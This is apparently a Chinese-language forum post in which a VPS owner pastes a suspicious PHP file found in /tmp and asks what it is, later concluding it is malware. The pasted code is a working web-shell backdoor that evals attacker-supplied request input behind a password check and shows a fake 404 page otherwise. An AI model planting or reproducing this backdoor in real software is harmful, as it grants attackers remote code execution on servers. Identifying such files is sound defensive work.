我有一个 VPS,我在上面安装了一些 Web 应用程序。它们都是开源应用程序。最近我的 VPS 负载非常高,所以我检查了我的日常进程日志,有一件事让我印象深刻。
是的,神秘的//tmp/cbmew.php。我在 google 上搜索了 cbmew.php,但我什么也没找到。这非常奇怪,因为我使用的是所有开源框架,所以我应该能够在网上找到它,不是吗?
知道这是什么文件吗?
内容如下:
<?php
@set_time_limit(0);
@error_reporting(NULL);
@ini_set('display_errors',0);
@ignore_user_abort(TRUE);
if(md5(md5($_REQUEST['psbt']))=='5aa0c942ede6e22dc5a379d86f28037f' and $_REQUEST['mjdu']!=NULL)
{
$_REQUEST['mjdu']=str_replace('\\"','"',$_REQUEST['mjdu']);
$_REQUEST['mjdu']=str_replace("\\'","'",$_REQUEST['mjdu']);
eval($_REQUEST['mjdu']);
die();
exit();
}
else
{
echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL '.$_SERVER['PHP_SELF'].' was not found on this server </p><p>Additionally, a 404 Not Found error was encountered while trying to use an Error Document to handle the request</p></body ></html >';die();exit();
}
?>
好的,经过一些谷歌搜索,我可以确定这是一个恶意软件。